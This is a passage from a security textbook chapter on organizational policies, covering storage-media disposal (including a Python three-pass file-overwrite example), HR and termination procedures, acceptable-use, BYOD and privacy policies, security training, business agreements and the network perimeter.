Many potential intruders have learned the value of dumpster diving. An organization must be concerned about not only paper trash and discarded objects, but also the information stored on discarded objects such as computers. Several government organizations have been embarrassed when old computers sold to salvagers proved to contain sensitive documents on their hard drives. It is critical for every organization to have a strong disposal and destruction policy and related procedures. Important papers should be shredded, and important in this case means anything that might be useful to a potential intruder. It is amazing what intruders can do with what appear to be innocent pieces of information.

Before magnetic storage media (such as disks or tapes) is discarded in the trash or sold for salvage, it should have all files deleted, and should be overwritten at least three times with all 1’s, all 0’s, and then random characters. Commercial products are available to destroy files using this process. It is not sufficient simply to delete all files and leave it at that, since the deletion process affects only the pointers to where the files are stored and doesn’t actually get rid of all the bits in the file. This is why it is possible to “undelete” files and recover them after they have been deleted. Two caveats apply to overwriting. First, current guidance (NIST SP 800-88) treats a single verified overwrite pass as sufficient for modern magnetic hard drives; extra passes do no harm but add time. Second, overwriting in place is unreliable for flash-based media (SSDs, USB sticks, memory cards), because wear leveling and spare blocks mean the old data may never be rewritten; for those, use the drive’s built-in sanitize or cryptographic-erase command, or physical destruction.

A safer method for destroying files from a storage device is to destroy the data magnetically, using a strong magnetic field to degauss the media. This effectively destroys all data on the media (and, on a modern hard drive, the servo tracks as well, so the drive is unusable afterward). Degaussing has no effect on flash memory. Several commercial degaussers are available for this purpose. Another method that can be used on hard drives is to use a file on them (the sort of file you’d find in a hardware store) and actually file off the magnetic material from the surface of the platter. Shredding floppy media is normally sufficient, but simply cutting a floppy disk into a few pieces is not enough; data has been successfully recovered from floppies that were cut into only a couple of pieces. CDs and DVDs also need to be disposed of appropriately. Many paper shredders now have the ability to shred these forms of storage media. In some highly secure environments, the only acceptable method of disposing of hard drives and other storage devices is the actual physical destruction of the devices. Here the important thing is to match the security action to the level of risk. Destroying hard drives that do not hold sensitive information is wasteful; proper file scrubbing is probably appropriate. For drives with ultra-sensitive information, physical destruction makes sense. There is no single answer, but as in most things associated with information security, the best practice is to match the action to the level of risk.
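The three-pass overwrite the text describes, as an added example (not code from the book or from any commercial product). It assumes a regular file on a local filesystem: each pass writes all 1’s, all 0’s, then random bytes over every byte of the file, flushes to disk, and the two fixed-pattern passes are read back and checked before the file is unlinked. The same caveat as above applies: on flash media, journaling or copy-on-write filesystems, and anything with snapshots, the old blocks may survive an in-place overwrite, so this is a file-level scrub for magnetic disks, not a substitute for sanitizing the whole device.

```python
"""Three-pass overwrite of a file before disposal (added example).

Writes all 1s, then all 0s, then random bytes over the file, fsyncs after
each pass, verifies the two fixed-pattern passes by reading back, then unlinks.
Assumes a regular file on a local filesystem; see the caveats in the text.
"""
import os
import secrets
import tempfile

CHUNK = 64 * 1024  # bytes written/read per step, keeps memory bounded for large files


def fill_for_pass(pass_no: int, n: int) -> bytes:
    """Bytes to write in a given pass: 0 -> all 1s, 1 -> all 0s, 2 -> random."""
    if pass_no == 0:
        return b"\xff" * n
    if pass_no == 1:
        return b"\x00" * n
    if pass_no == 2:
        return secrets.token_bytes(n)
    raise ValueError("only passes 0..2 are defined")


def _write_pass(f, size: int, pass_no: int) -> None:
    """Overwrite the whole file with the pass pattern and force it to disk."""
    f.seek(0)
    written = 0
    while written < size:
        n = min(CHUNK, size - written)
        f.write(fill_for_pass(pass_no, n))
        written += n
    f.flush()
    os.fsync(f.fileno())


def _verify_pass(f, size: int, pass_no: int) -> bool:
    """Read the file back and confirm every chunk matches the fixed pattern."""
    f.seek(0)
    checked = 0
    while checked < size:
        n = min(CHUNK, size - checked)
        if f.read(n) != fill_for_pass(pass_no, n):
            return False
        checked += n
    return True


def overwrite_and_unlink(path: str) -> dict:
    """Scrub a file in place, then remove its directory entry."""
    size = os.path.getsize(path)
    verified = 0
    with open(path, "r+b") as f:
        for pass_no in range(3):
            _write_pass(f, size, pass_no)
            # The random pass cannot be re-derived, so only passes 0 and 1 are verified.
            if pass_no < 2 and _verify_pass(f, size, pass_no):
                verified += 1
    os.remove(path)  # removing the pointer is the last step, not the only one
    return {"bytes": size, "passes": 3, "verified_fixed_passes": verified}


def scrub_demo() -> dict:
    """Create a throwaway file with constructed sample data and scrub it."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(b"SSN 000-00-0000, salary 123456\n" * 512)  # constructed, 15872 bytes
        path = tmp.name
    result = overwrite_and_unlink(path)
    result["still_exists"] = os.path.exists(path)
    return result


if __name__ == "__main__":
    print(scrub_demo())
```

For a whole device rather than a file, the same pattern is normally driven by a dedicated tool against the raw block device, with the verification step reading the device back rather than a file handle.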
Human Resources Policies
It has been said that the weakest links in the security chain are the humans. Consequently, it is important for organizations to have policies in place relative to their employees. Policies that relate to the hiring of individuals are of primary importance. The organization needs to make sure that it hires individuals who can be trusted with the organization’s data and that of its clients. Once employees are hired, they should be kept from slipping into the category of “disgruntled employee.” Finally, policies must be developed to address the inevitable point in the future when an employee leaves the organization, either on his or her own or with the “encouragement” of the organization itself. Security issues must be considered at each of these points.

Many organizations overlook the security implications that decisions by Human Resources may have. Human Resources personnel and security personnel should have a close working relationship. Decisions on the hiring and firing of personnel have direct security implications for the organization. As a result, procedures should be in place that specify which actions must be taken when an employee is hired, is terminated, or retires.
Code of Ethics
Numerous professional organizations have established codes of ethics for their members. Each of these describes the expected behavior of their members from a high-level standpoint. Organizations can adopt this idea as well. For organizations, a code of ethics can set the tone for how employees will be expected to act and to conduct business. The code should demand honesty from employees and require that they perform all activities in a professional manner. The code could also address principles of privacy and confidentiality and state how employees should treat client and organizational data. Conflicts of interest can often cause problems, so this could also be covered in the code of ethics. By outlining a code of ethics, the organization can encourage an environment that is conducive to integrity and high ethical standards. For additional ideas on possible codes of ethics, check professional organizations such as the Institute of Electrical and Electronics Engineers (IEEE), the Association for Computing Machinery (ACM), or the Information Systems Security Association (ISSA).
Tech Tip
Hiring Hackers
Hiring a skilled hacker may make sense from a technical skills point of view, but an organization also has to consider the broader ethical and business consequences and associated risks. Is the hacker completely reformed or not? How much time is needed to determine this? The real question is not “Would you hire a hacker?” but rather “Can you fire a hacker once he has had access to your systems?” Trust is an important issue with employees who have system administrator access, and the long-term ramifications need to be considered.
Job Rotation
An interesting approach to enhance security that is gaining increasing attention is job rotation. Organizations often discuss the benefits of rotating individuals through various jobs in an organization’s IT department. By rotating through jobs, individuals gain a better perspective on how the various parts of IT can enhance (or hinder) the business. Since security is often a misunderstood aspect of IT, rotating individuals through security positions can result in a much wider understanding throughout the organization about potential security problems. It also can have the side benefit of a company not having to rely on any one individual too heavily for security expertise. If all security tasks are the domain of one employee, and that individual leaves suddenly, security at the organization could suffer. On the other hand, if security tasks are understood by many different individuals, the loss of any one individual has less of an impact on the organization. Rotation also acts as a detective control: an irregularity that one person has been concealing is likely to surface when someone else takes over the job.
Employee Hiring and Promotions
It is becoming common for organizations to run background checks on prospective employees and to check the references prospective employees supply. Frequently, organizations require drug testing, check for any past criminal activity, verify claimed educational credentials, and confirm reported work history. For highly sensitive environments, special security background investigations can also be required. Make sure that your organization hires the most capable and trustworthy employees, and that your policies are designed to ensure this.

After an individual has been hired, your organization needs to minimize the risk that the employee will ignore company rules and affect security. Periodic reviews by supervisory personnel, additional drug checks, and monitoring of activity during work may all be considered by the organization. If the organization chooses to implement any of these reviews, this must be specified in the organization’s policies, and prospective employees should be made aware of these policies before being hired. What an organization can do in terms of monitoring and requiring drug tests, for example, can be severely restricted if not spelled out in advance as terms of employment. New hires should be made aware of all pertinent policies, especially those applying to security, and should be asked to sign documents indicating that they have read and understood them.
Tech Tip
Accounts of Former Employees
When conducting security assessments of organizations, security professionals frequently find active accounts for individuals who no longer work for the company. This is especially true for larger organizations, which may lack a clear process for the personnel office to communicate with the network administrators when an employee leaves the organization. These old accounts, however, are a weak point in the security perimeter for the organization and should be eliminated.
Occasionally an employee’s status will change within the company. If the change can be construed as a negative personnel action (such as a demotion), supervisors should be alerted to watch for changes in behavior that might indicate the employee is contemplating or conducting unauthorized activity. It is likely that the employee will be upset, and whether he acts on this to the detriment of the company is something that needs to be guarded against. In the case of a demotion, the individual may also lose certain privileges or access rights, and these changes should be made quickly so as to lessen the likelihood that the employee will destroy previously accessible data if he becomes disgruntled and decides to take revenge on the organization. On the other hand, if the employee is promoted, privileges may still change, but the need to make the change to access privileges may not be as urgent, though it should still be accomplished as quickly as possible. If the move is a lateral one, changes may also need to take place, and again they should be accomplished as quickly as possible.
Retirement, Separation, or Termination of an Employee
An employee leaving an organization can be either a positive or a negative action. Employees who are retiring by their own choice may announce their planned retirement weeks or even months in advance. Limiting their access to sensitive documents the moment they announce their intention may be the safest thing to do, but it might not be necessary. Each situation should be evaluated individually. If the situation is a forced retirement, the organization must determine the risk to its data if the employee becomes disgruntled as a result of the action. In this situation, the wisest choice might be to cut off the employee’s access quickly and provide her with some additional vacation time. This might seem like an expensive proposition, but the danger to the company of having a disgruntled employee may justify it. Again, each case should be evaluated individually.

It is better to give a potentially disgruntled employee several weeks of paid vacation than to have him trash sensitive files to which he has access. Because employees typically know the pattern of management behavior with respect to termination, doing the right thing will pay dividends in the future for a firm.
When an employee decides to leave a company, generally as a result of a new job offer, continued access to sensitive information should be carefully considered. If the employee is leaving as a result of hard feelings toward the company, it might be wise to quickly revoke her access privileges. If the employee is leaving the organization because he is being terminated, you should assume that he is or will become disgruntled. While it may not seem the friendliest thing to do, an employee in this situation should immediately have his access privileges to sensitive information and facilities revoked. Combinations should also be quickly changed once an employee has been informed of their termination. Access cards, keys, and badges should be collected; the employee should be escorted to her desk and watched as she packs personal belongings; and then she should be escorted from the building.

Organizations commonly neglect to have a policy that mandates the removal of an individual’s computer access upon termination. Not only should such a policy exist, but it should also include the procedures to reclaim and “clean” a terminated employee’s computer system and accounts. Revocation should cover more than the primary login: remote access (VPN) credentials, cloud and SaaS accounts, shared or group passwords the employee knew, SSH keys and API tokens, and any enrolled mobile devices all need to be disabled or rotated. The account itself is normally disabled rather than deleted until any retention or investigative hold on its data has expired, and the procedure should be driven by a notification from Human Resources so that it runs on the day of termination, not when someone eventually notices.
Mandatory Vacations
Organizations have provided vacation time to their employees for many years. Few, however, force employees to take this time if they don’t want to. At some companies, employees are given the choice to either “use or lose” their vacation time; if they do not take all of their vacation time, they lose at least a portion of it. From a security standpoint, an employee who never takes time off might be involved in nefarious activity, such as fraud or embezzlement, and might be afraid that if he leaves on vacation, the organization will discover his illicit activities. As a result, requiring employees to use their vacation time through a policy of mandatory vacations can be a security protection mechanism. Using mandatory vacations as a tool to detect fraud will require that somebody else also be trained in the functions of the employee who is on vacation. Having a second person familiar with security procedures is also a good policy in case something happens to the primary employee.
On-boarding/Off-boarding Business Partners
Just as it is important to manage the on- and off-boarding processes of company personnel, it is important to consider the same types of elements when making arrangements with third parties. Agreements with business partners tend to be fairly specific about the mutual expectations of each party in the business process itself. Considerations regarding the on-boarding and off-boarding processes are important, especially the off-boarding. When a contract arrangement with a third party comes to an end, issues as to data retention and destruction by the third party need to be addressed. These considerations need to be made prior to the establishment of the relationship, not added at the time that it is coming to an end.

On-boarding and off-boarding business procedures should be well documented to ensure compliance with legal requirements.
Social Media Networks
The rise of social media networks has changed many aspects of business. Whether used for marketing, communications, customer relations, or some other purpose, social media networks can be considered a form of third party. One of the challenges in working with social media networks and/or applications is their terms of use. While a relationship with a typical third party involves a negotiated set of agreements with respect to requirements, there is no negotiation with social media networks. The only option is to adopt their terms of service, so it is important to understand the implications of these terms with respect to the business use of the social network.
Acceptable Use Policy
An acceptable use policy (AUP) outlines what the organization considers to be the appropriate use of company resources, such as computer systems, e-mail, Internet access, and networks. Organizations should be concerned about personal use of organizational assets that does not benefit the company. The goal of the AUP is to ensure employee productivity while limiting organizational liability through inappropriate use of the organization’s assets. The AUP should clearly delineate what activities are not allowed. It should address issues such as the use of resources to conduct personal business, installation of hardware or software, remote access to systems and networks, the copying of company-owned software, and the responsibility of users to protect company assets, including data, software, and hardware. Statements regarding possible penalties for ignoring any of the policies (such as termination) should also be included.

Related to appropriate use of the organization’s computer systems and networks by employees is the appropriate use by the organization. The most important of such issues is whether the organization considers it appropriate to monitor the employees’ use of the systems and network. If monitoring is considered appropriate, the organization should include a statement to this effect in the banner that appears at login. This repeatedly warns employees, and possible intruders, that their actions are subject to monitoring and that any misuse of the system will not be tolerated. Should the organization need to use in a civil or criminal case any information gathered during monitoring, the issue of whether the employee had an expectation of privacy, or whether it was even legal for the organization to be monitoring, is simplified if the organization can point to a statement that is always displayed that instructs users that use of the system constitutes consent to monitoring. Before any monitoring is conducted, or the actual wording on the warning message is created, the organization’s legal counsel should be consulted to determine the appropriate way to address this issue in the particular jurisdiction.

In today’s highly connected environment, every organization should have an AUP that spells out to all employees what the organization considers appropriate and inappropriate use of its computing and network resources. Having this policy may be critical should the organization need to take disciplinary actions based on an abuse of its resources.
Internet Usage Policy
In today’s highly connected environment, employee use of access to the Internet is of particular concern. The goal of the Internet usage policy is to ensure maximum employee productivity and to limit potential liability to the organization from inappropriate use of the Internet in a workplace. The Internet provides a tremendous temptation for employees to waste hours as they surf the Web for the scores of games from the previous night, conduct quick online stock transactions, or read the review of the latest blockbuster movie everyone is talking about. In addition, allowing employees to visit sites that may be considered offensive to others (such as pornographic or hate sites) can open the company to accusations of condoning a hostile work environment and result in legal liability. The Internet usage policy needs to address what sites employees are allowed to visit and what sites they are not allowed to visit. If the company allows them to surf the Web during nonwork hours, the policy needs to clearly spell out the acceptable parameters, in terms of when they are allowed to do this and what sites they are still prohibited from visiting (such as potentially offensive sites). The policy should also describe under what circumstances an employee would be allowed to post something from the organization’s network on the Web (on a blog, for example). A necessary addition to this policy would be the procedure for an employee to follow to obtain permission to post the object or message.
E-Mail Usage Policy
Related to the Internet usage policy is the e-mail usage policy, which deals with what the company will allow employees to send in, or as attachments to, e-mail messages. This policy should spell out whether nonwork e-mail traffic is allowed at all or is at least severely restricted. It needs to cover the type of message that would be considered inappropriate to send to other employees (for example, no offensive language, no sex-related or ethnic jokes, no harassment, and so on). The policy should also specify any disclaimers that must be attached to an employee’s message sent to an individual outside the company. The policy should remind employees of the risks of clicking on links in e-mails, or opening attachments, as these can be social engineering attacks.
Clean Desk Policy
Preventing access to information is also important in the work area. Firms with sensitive information should have a “clean desk policy” specifying that sensitive information must not be left unsecured in the work area when the worker is not present to act as custodian. Even leaving the desk area and going to the bathroom can leave information exposed and subject to compromise. The clean desk policy should identify and prohibit things that are not obvious upon first glance, such as passwords on sticky notes under keyboards and mouse pads or in unsecured desk drawers. All of these elements that demonstrate the need for a clean desk are lost if employees do not make them personal. Training for clean desk activities needs to make the issue a personal one, where consequences are understood and the workplace reinforces the positive activity.
Bring Your Own Device (BYOD) Policy
Everyone seems to have a smartphone, a tablet, or other personal Internet device that they use in their personal lives. Bringing these to work is a natural extension of one’s normal activities, but this raises the question of what policies are appropriate before a firm allows these devices to connect to the corporate network and access company data. Like all other policies, planning is needed to define the appropriate pathway to the company objectives. Personal devices offer cost savings and positive user acceptance, and in many cases these factors make allowing BYOD a sensible decision.

The primary purpose of a BYOD policy is to lower the risk associated with connecting a wide array of personal devices to a company’s network and accessing sensitive data on them. This places security, in the form of risk management, as a center element of a BYOD policy. Devices need to be maintained in a current, up-to-date software posture, and with certain security features, such as screen locks and passwords, enabled. Remote wipe, device encryption, and similar features should be enabled, and highly sensitive data, especially in aggregate, should not be allowed on the devices. Users should have specific training as to what is allowed and what isn’t and should be made aware of the increased responsibility associated with a mobile means of accessing corporate resources.

In some cases it may be necessary to define a policy associated with personally owned devices. This policy will describe the rules and regulations associated with use of personally owned devices with respect to corporate data, network connectivity, and security risks.
Privacy Policy
Customers place an enormous amount of trust in organizations to which they provide personal information. These customers expect their information to be kept secure so that unauthorized individuals will not gain access to it and so that authorized users will not use the information in unintended ways. Organizations should have a privacy policy that explains what their guiding principles will be in guarding personal data to which they are given access.

A special category of private information that is becoming increasingly important today is personally identifiable information (PII). This category of information includes any data that can be used to uniquely identify an individual. This would include an individual’s name, address, driver’s license number, and other details. An organization that collects PII on its employees and customers must make sure that it takes all necessary measures to protect the data from compromise.
Cross Check
Privacy
Privacy is an important consideration in today’s computing environment. As such, it has been given its own chapter, Chapter 25. Additional details on privacy issues can be found there.
Tech Tip
Prudent Person Principle
The concepts of due care and due diligence are connected. Due care addresses whether the organization has a minimal set of policies that provides reasonable assurance of success in maintaining security. Due diligence requires that management actually do something to ensure security, such as implement procedures for testing and review of audit records, internal security controls, and personnel behavior. The standard applied is one of a “prudent person”; would a prudent person find the actions appropriate and sincere? To apply this standard, all one has to do is ask the following question for the issue under consideration: “What would a prudent person do to protect and ensure that the security features and procedures are working or adequate?” Failure of a security feature or procedure doesn’t necessarily mean the person acted imprudently.
Due Care and Due Diligence
Due care and due diligence are terms used in the legal and business community to define reasonable behavior. Basically, the law recognizes the responsibility of an individual or organization to act reasonably relative to another party. If party A alleges that the actions of party B have caused it loss or injury, party A must prove that party B failed to exercise due care or due diligence and that this failure resulted in the loss or injury. These terms often are used synonymously, but due care generally refers to the standard of care a reasonable person is expected to exercise in all situations, whereas due diligence generally refers to the standard of care a business is expected to exercise in preparation for a business transaction. An organization must take reasonable precautions before entering a business transaction or it might be found to have acted irresponsibly. In terms of security, organizations are expected to take reasonable precautions to protect the information that they maintain on individuals. Should a person suffer a loss as a result of negligence on the part of an organization in terms of its security, that person typically can bring a legal suit against the organization.

The standard applied, reasonableness, is extremely subjective and often is determined by a jury. The organization will need to show that it had taken reasonable precautions to protect the information, and that, despite these precautions, an unforeseen security event occurred that caused the injury to the other party. Since this is so subjective, it is hard to describe what would be considered reasonable, but many sectors have a set of “security best practices” for their industry, which provides a basis for organizations in that sector to start from. If the organization decides not to follow any of the best practices accepted by the industry, it needs to be prepared to justify its reasons in court should an incident occur. If the sector the organization is in has regulatory requirements, justifying why the mandated security practices were not followed will be much more difficult (if not impossible).

Due diligence is the application of a specific standard of care. Due care is the degree of care that an ordinary person would exercise.
Due Process
Due process is concerned with guaranteeing fundamental fairness, justice, and liberty in relation to an individual’s legal rights. In the United States, due process is concerned with the guarantee of an individual’s rights as outlined by the Constitution and Bill of Rights. Procedural due process is based on the concept of what is “fair.” Also of interest is the recognition by courts of a series of rights that are not explicitly specified by the Constitution but that the courts have decided are implicit in the concepts embodied by the Constitution. An example of this is an individual’s right to privacy. From an organization’s point of view, due process may come into play during an administrative action that adversely affects an employee. Before an employee is terminated, for example, were all of the employee’s rights protected? An actual example pertains to the rights of privacy regarding employees’ e-mail messages. As the number of cases involving employers examining employee e-mails grows, case law continues to be established and the courts eventually will settle on what rights an employee can expect. The best thing an employer can do if faced with this sort of situation is to work closely with HR staff to ensure that appropriate policies are followed and that those policies are in keeping with current laws and regulations.
Incident Response Policies and Procedures
No matter how careful an organization is, eventually a security incident of some sort will occur. When it happens, how effectively the organization responds to it will depend greatly on how prepared it is to handle incidents. An incident response policy and associated procedures should be developed to outline how the organization will prepare for security incidents and respond to them when they occur. Waiting until an incident happens is not the right time to establish your policies; they need to be designed in advance. The incident response policy should cover five phases: preparation, detection, containment and eradication, recovery, and follow-up actions.
Cross Check
Incident Response
Incident response is covered in detail in Chapter 22. This section serves only as an introduction to policy elements associated with the topic. For complete details on incident response, please examine Chapter 22.
Security Awareness and Training
Security awareness and training programs can enhance an organization’s security posture in two direct ways. First, they teach personnel how to follow the correct set of actions to perform their duties in a secure manner. Second, they make personnel aware of the indicators and effects of social engineering attacks.

There are many tasks that employees perform that can have information security ramifications. Properly trained employees are able to perform their duties in a more effective manner, including their duties associated with information security. The extent of information security training will vary depending on the organization’s environment and the level of threat, but initial employee security training at the time of being hired is important, as is periodic refresher training. A strong security education and awareness training program can go a long way toward reducing the chance that a social engineering attack will be successful. Security awareness programs and campaigns, which might include seminars, videos, posters, newsletters, and similar materials, are also fairly easy to implement and are not very costly.
Security Policy Training and Procedures
Personnel cannot be expected to perform complex tasks without training with respect to the tasks and expectations. This applies both to the security policy and to operational security details. If employees are going to be expected to comply with the organization’s security policy, they must be properly trained in its purpose, meaning, and objectives. Training with respect to the information security policy, individual responsibilities, and expectations is something that requires periodic reinforcement through refresher training.

Because the security policy is a high-level directive that sets the overall support and executive direction with respect to security, it is important that the meaning of this message be translated and supported. Second-level policies such as password, access, information handling, and acceptable use policies also need to be covered. The collection of policies should paint a picture describing the desired security culture of the organization. The training should be designed to ensure that people see and understand the whole picture, not just the elements.
Role-based Training
For training to be effective, it needs to be targeted to the user with regard to their role in the subject of the training. While all employees may need general security awareness training, they also need specific training in areas where they have individual responsibilities. Role-based training with regard to information security responsibilities is an important part of information security training.

If a person has job responsibilities that may impact information security, then role-specific training is needed to ensure that the individual understands the responsibilities as they relate to information security. Some roles, such as system administrator or developer, have clearly defined information security responsibilities. The roles of others, such as project manager or purchasing manager, have information security impacts that are less obvious, but these roles require training as well. In fact, the less-obvious but wider-impact roles of middle management can have a large effect on the information security culture, and thus if a specific outcome is desired, it requires training.

As in all personnel-related training, two elements need attention. First, retraining over time is necessary to ensure that personnel keep proper levels of knowledge. Second, as people change jobs, a reassessment of the required training basis is needed, and additional training may be required. Maintaining accurate training records of personnel is the only way this can be managed in any significant enterprise.
Compliance with Laws, Best Practices, and Standards
There is a wide array of laws, regulations, contractual requirements, standards, and best practices associated with information security. Each places its own set of requirements upon an organization and its personnel. The only effective way for an organization to address these requirements is to build them into their own policies and procedures. Training to one’s own policies and procedures would then translate into coverage of these external requirements.

It is important to note that many of these external requirements impart a specific training and awareness component upon the organization. Organizations subject to the requirements of the Payment Card Industry Data Security Standard (PCI DSS), the Gramm-Leach-Bliley Act (GLBA), or the Health Insurance Portability and Accountability Act (HIPAA) are among the many that must maintain a specific information security training program. Other organizations should do so as a matter of best practice.
User Habits
Individual user responsibilities vary between organizations and the type of business each organization is involved in, but there are certain very basic responsibilities that all users should be instructed to adopt:
Lock the door to your office or workspace, including drawers and cabinets.
Do not leave sensitive information inside your car unprotected.
Secure storage media containing sensitive information in a secure storage device.
Shred paper containing organizational information before discarding it.
Do not divulge sensitive information to individuals (including other employees) who do not have an authorized need to know it.
Do not discuss sensitive information with family members. (The most common violation of this rule occurs in regard to HR information, as employees, especially supervisors, may complain to their spouse or friends about other employees or about problems that are occurring at work.)
Protect laptops and other mobile devices that contain sensitive or important organization information wherever the device may be stored or left. (It’s a good idea to ensure that sensitive information is encrypted on the laptop or mobile device so that, should the equipment be lost or stolen, the information remains safe.)
Be aware of who is around you when discussing sensitive corporate information. Does everybody within earshot have the need to hear this information?
Enforce corporate access control procedures. Be alert to, and do not allow, piggybacking, shoulder surfing, or access without the proper credentials.
Be aware of the correct procedures to report suspected or actual violations of security policies.
Follow procedures established to enforce good password security practices. Passwords are such a critical element that they are frequently the ultimate target of a social engineering attack. Though such password procedures may seem too oppressive or strict, they are often the best line of defense.
User habits are a front-line security tool in engaging the workforce to improve the overall security posture of an organization.
User responsibilities are easy training topics about which to ask questions on the CompTIA Security+ exam, so commit to memory your knowledge of the points listed here.
New Threats and Security Trends/Alerts
At the end of the day, information security practices are about managing risk, and it is well known that the risk environment is one marked by constant change. The ever-evolving threat environment frequently encounters new threats, new security issues, and new forms of defense. Training people to recognize the new threats necessitates continual awareness and training refresher events.
New Viruses
New forms of viruses, or malware, are being created every day. Some of these new forms can be highly destructive and costly, and it is incumbent upon all users to be on the lookout for and take actions to avoid exposure. Poor user practices are counted on by malware authors to assist in the spread of their attacks. One way of explaining proper actions to users is to use an analogy to cleanliness. Training users to practice good hygiene in their actions can go a long way toward assisting the enterprise in defending against these attack vectors.
Phishing Attacks
The best defense against phishing and other social engineering attacks is an educated and aware body of employees. Continual refresher training about the topic of social engineering and specifics about current attack trends are needed to keep employees aware of and prepared for new trends in social engineering attacks. Attackers rely upon an uneducated, complacent, or distracted workforce to enable their attack vector. Social engineering has become the gateway for many of the most damaging attacks in play today. Social engineering is covered extensively in Chapter 4.
Social Networking and P2P
With the rise in popularity of peer-to-peer (P2P) communications and social networking sites—notably Facebook, Twitter, and LinkedIn—many people have gotten into a habit of sharing too much information. Using a status of “Returning from sales call to XYZ company” reveals information to people who have no need to know this information. Confusing sharing with friends and sharing business information with those who don’t need to know is a line people are crossing on a regular basis. Don’t be the employee who mixes business and personal information and releases information to parties who should not have it, regardless of how innocuous it may seem. Users need to understand the importance of not using common programs such as torrents and other file sharing in the workplace, as these programs can result in infection mechanisms and data-loss channels. The information security training and awareness program should cover these issues. If the issues are properly explained to employees, their motivation to comply won’t simply be to avoid adverse personnel action for violating a policy; they will want to assist in the security of the organization and its mission.
Training Metrics and Compliance
Training and awareness programs can yield much in the way of an educated and knowledgeable workforce. Many laws, regulations, and best practices have requirements for maintaining a trained workforce. Having a record-keeping system to measure compliance with attendance and to measure the effectiveness of the training is a normal requirement. Simply conducting training is not sufficient. Following up and gathering training metrics to validate compliance and security posture is an important aspect of security training management. A number of factors deserve attention when managing security training.
Because of the diverse nature of role-based requirements, maintaining an active, up-to-date listing of individual training and retraining requirements is one challenge. Monitoring the effectiveness of the training is yet another challenge. Creating an effective training and awareness program when measured by actual impact on employee behavior is a challenging endeavor. Training needs to be current, relevant, and interesting to engage employee attention. Simple repetition of the same training material has not proven to be effective, so regularly updating the program is a requirement if it is to remain effective over time.
Tech Tip
Security Training Records
Requirements for both periodic training and retraining drive the need for good training records. Maintaining proper information security training records is a requirement of several laws and regulations and should be considered a best practice.
Interoperability Agreements
Many business operations involve actions between many different parties—some within an organization, and some in different organizations. These actions require communication between the parties, defining the responsibilities and expectations of the parties, the business objectives, and the environment within which the objectives will be pursued. To ensure an agreement is understood between the parties, written agreements are used. Numerous forms of legal agreements and contracts are used in business, but with respect to security, some of the most common ones are the service level agreement, business partnership agreement, memorandum of understanding, and interconnection security agreement.
Service Level Agreements
Service level agreements (SLAs) are contractual agreements between entities that describe specified levels of service that the servicing entity agrees to guarantee for the customer. SLAs essentially set the requisite level of performance of a given contractual service. SLAs are typically included as part of a service contract and set the level of technical expectations. An SLA can define specific services, the performance level associated with a service, issue management and resolution, and so on. SLAs are negotiated between customer and supplier and represent the agreed-upon terms. An organization contracting with a service provider should remember to include in the agreement a section describing the service provider’s responsibility in terms of business continuity and disaster recovery. The provider’s backup plans and processes for restoring lost data should also be clearly described. Typically, a good SLA will satisfy two simple rules. First, it will describe the entire set of product or service functions in sufficient detail that their requirement will be unambiguous. Second, the SLA will provide a clear means of determining whether a specified function or service has been provided at the agreed-upon level of performance.
Business Partnership Agreement
A business partnership agreement (BPA) is a legal agreement between partners establishing the terms, conditions, and expectations of the relationship between the partners. These details can cover a wide range of issues, including typical items such as the sharing of profits and losses, the responsibilities of each partner, the addition or removal of partners, and any other issues. The Uniform Partnership Act (UPA), established by state law and convention, lays out a uniform set of rules associated with partnerships to resolve any partnership terms. The terms in a UPA are designed as “one size fits all” and are not typically in the best interest of any specific partnership. To avoid undesired outcomes that may result from UPA terms, it is best for partnerships to spell out specifics in a BPA.
Memorandum of Understanding
A memorandum of understanding (MOU) is a legal document used to describe a bilateral agreement between parties. It is a written agreement expressing a set of intended actions between the parties with respect to some common pursuit or goal. It is more formal and detailed than a simple handshake, but it generally lacks the binding powers of a contract. It is also common to find MOUs between different units within an organization to detail expectations associated with the common business interest.
Interconnection Security Agreement
An interconnection security agreement (ISA) is a specialized agreement between organizations that have interconnected IT systems, the purpose of which is to document the security requirements associated with the interconnection. An ISA can be a part of an MOU detailing the specific technical security aspects of a data interconnection.
Be sure you understand the differences between the interoperability agreements SLA, BPA, MOU, and ISA. The differences hinge upon the purpose for each document.
The Security Perimeter
The discussion to this point has not included any mention of the specific technology used to enforce operational and organizational security or a description of the various components that constitute the organization’s security perimeter. If the average administrator were asked to draw a diagram depicting the various components of their network, the diagram would probably look something like Figure 3.1.
• Figure 3.1 Basic diagram of an organization’s network
The security perimeter, with its several layers of security, along with additional security mechanisms that may be implemented on each system (such as user IDs/passwords), creates what is sometimes known as defense-in-depth. This implies that security is enhanced when there are multiple layers of security (the depth) through which an attacker would have to penetrate to reach the desired goal.
This diagram includes the major components typically found in a network. The connection to the Internet generally has some sort of protection attached to it such as a firewall. An intrusion detection system (IDS), also often part of the security perimeter for the organization, may be either on the inside or the outside of the firewall, or it may in fact be on both sides. The specific location depends on the company and what it is more concerned about preventing (that is, insider threats or external threats). The router can also be thought of as a security device, as it can be used to enhance security such as in the case of wireless routers that can be used to enforce encryption settings. Beyond this security perimeter is the corporate network. Figure 3.1 is obviously a very simple depiction—an actual network can have numerous subnets and extranets as well as wireless access points—but the basic components are present. Unfortunately, if this were the diagram provided by the administrator to show the organization’s basic network structure, the administrator would have missed a very important component. A more astute administrator would provide a diagram more like Figure 3.2.
• Figure 3.2 A more complete diagram of an organization’s network
This diagram includes other possible access points into the network, including the public switched telephone network (PSTN) and wireless access points. The organization may or may not have any authorized modems or wireless networks, but the savvy administrator would realize that the potential exists for unauthorized versions of both. When considering the policies, procedures, and guidelines needed to implement security for the organization, both networks need to be considered. Another development that has brought the telephone and computer networks together is the implementation of voice over IP (VoIP), which eliminates the traditional landlines in an organization and replaces them with special telephones that connect to the IP data network. While Figure 3.2 provides a more comprehensive view of the various components that need to be protected, it is still incomplete. Most experts will agree that the biggest danger to any organization does not come from external attacks but rather from the insider—a disgruntled employee or somebody else who has physical access to the facility. Given physical access to an office, the knowledgeable attacker will quickly find the information needed to gain access to the organization’s computer systems and network. Consequently, every organization also needs security policies, procedures, and guidelines that cover physical security, and every security administrator should be concerned with these as well. While physical security (which can include such things as locks, cameras, guards and entry points, alarm systems, and physical barriers) will probably not fall under the purview of the security administrator, the operational state of the organization’s physical security measures is just as important as many of the other network-centric measures.
